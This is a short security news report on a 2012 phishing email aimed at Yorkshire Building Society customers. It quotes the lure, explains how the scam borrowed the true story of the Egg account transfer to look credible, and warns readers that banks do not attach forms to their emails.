Cybercriminals rely on a true story to make their scheme more legitimate-looking
The folks from Hoax Slayer have stumbled upon an interesting phishing scam that’s designed to steal the credit card details and contact information of unsuspecting Yorkshire Building Society customers.Entitled “Our commitment to online security,” the malicious notifications look something like this:
Egg Savings and Mortgage accounts have now been transferred to Yorkshire Building Society's systems. As a Yorkshire Building Society customer you'll continue to enjoy all the services you used with Egg.
We believe it's important to keep up to date with the latest online security measures, We recently upgraded our database system for new security measures. We have tried to contact you but have been unable to do so.
Please proceed via attached file to automatically upgrade your details.
If you do not confirm your details until 05 October 2012 your online account will be interrupted for security reasons.
Yorkshire Building Society.
Of course, the message has nothing to do with Yorkshire Building Society. While it’s true that the organization did acquire Egg’s mortgage and savings accounts, the rest of the alert has been made up by the crooks.
Internauts who fall for it and open the attachment are presented a form that requests that they hand over their details. Once the form is submitted, all the valuable credit card information is safely stored in a database controlled by the crooks.
In this case, if the victim decides to check out the account transfer story, he/she will see that it’s true. This increases the chances for the phishing scheme to record a higher rate of success.
Once again, we would like to remind everyone that banks will never attach forms to the emails they send out to customers. Also, the links contained in legitimate emails will always point to the institution’s official website.